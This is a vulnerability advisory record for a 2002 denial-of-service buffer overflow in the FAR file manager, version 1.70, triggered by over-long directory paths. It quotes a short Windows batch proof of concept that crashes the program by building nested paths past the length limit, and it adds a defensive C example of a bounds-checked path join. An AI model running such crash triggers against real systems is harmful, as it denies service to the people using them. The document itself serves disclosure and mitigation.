vendor: FAR
by: SecurityFocus
CVSS: 7.5 (HIGH)
Buffer Overflow
CWE: 120
Product Name: FAR
Affected Version From: FAR 1.70
Affected Version To: FAR 1.70
Patch Exists: YES
Related CWE: N/A
CPE: //a:far
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Buffer Overflow Vulnerability in FAR

A buffer overflow vulnerability has been reported for FAR that may result in a denial of service condition. The vulnerability exists because FAR performs insufficient bounds checking when parsing directory paths. Specifically, when FAR attempts to parse overly long paths, it crashes, resulting in a denial of service condition.

Mitigation:

Upgrade to the latest version of FAR
Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6822/info

SET A=A<260 chars>A
SET B=BBBBBBBBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%B%\
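
The flaw described above is a missing length check when a path is assembled or parsed into a fixed buffer. The following is an added example, not FAR's code and not part of the original advisory, of a bounds-checked path join that rejects an over-long component instead of overflowing. The names join_path_checked and FIXED_PATH_MAX are hypothetical, and the 260-byte buffer size is an assumption based on the Windows MAX_PATH limit.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define FIXED_PATH_MAX 260 /* assumed buffer size: Windows MAX_PATH */

/* Join dir and name into dst (capacity dstsz), adding a backslash if needed.
 * Returns 0 on success, -1 if the result plus NUL would not fit.
 * On failure dst is left empty, never overflowed or silently truncated. */
int join_path_checked(char *dst, size_t dstsz, const char *dir, const char *name)
{
    size_t dlen, nlen, sep;

    if (dst == NULL || dstsz == 0 || dir == NULL || name == NULL)
        return -1;
    dst[0] = '\0';
    dlen = strlen(dir);
    nlen = strlen(name);
    sep = (dlen > 0 && dir[dlen - 1] != '\\') ? 1 : 0;

    /* Compare against the space that remains, so the sums cannot wrap. */
    if (dlen >= dstsz)
        return -1;
    if (sep > dstsz - 1 - dlen)
        return -1;
    if (nlen > dstsz - 1 - dlen - sep)
        return -1;

    memcpy(dst, dir, dlen);
    if (sep)
        dst[dlen] = '\\';
    memcpy(dst + dlen + sep, name, nlen);
    dst[dlen + sep + nlen] = '\0';
    return 0;
}

int main(void)
{
    char buf[FIXED_PATH_MAX];
    char longname[263]; /* constructed sample: 262-character directory name */

    memset(longname, 'A', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';

    printf("short: %d\n", join_path_checked(buf, sizeof buf, "c:\\", "docs"));
    printf("long:  %d\n", join_path_checked(buf, sizeof buf, "c:\\", longname));
    return 0;
}
```

A caller that receives -1 should report the path as too long and skip it, rather than continue with a partial path.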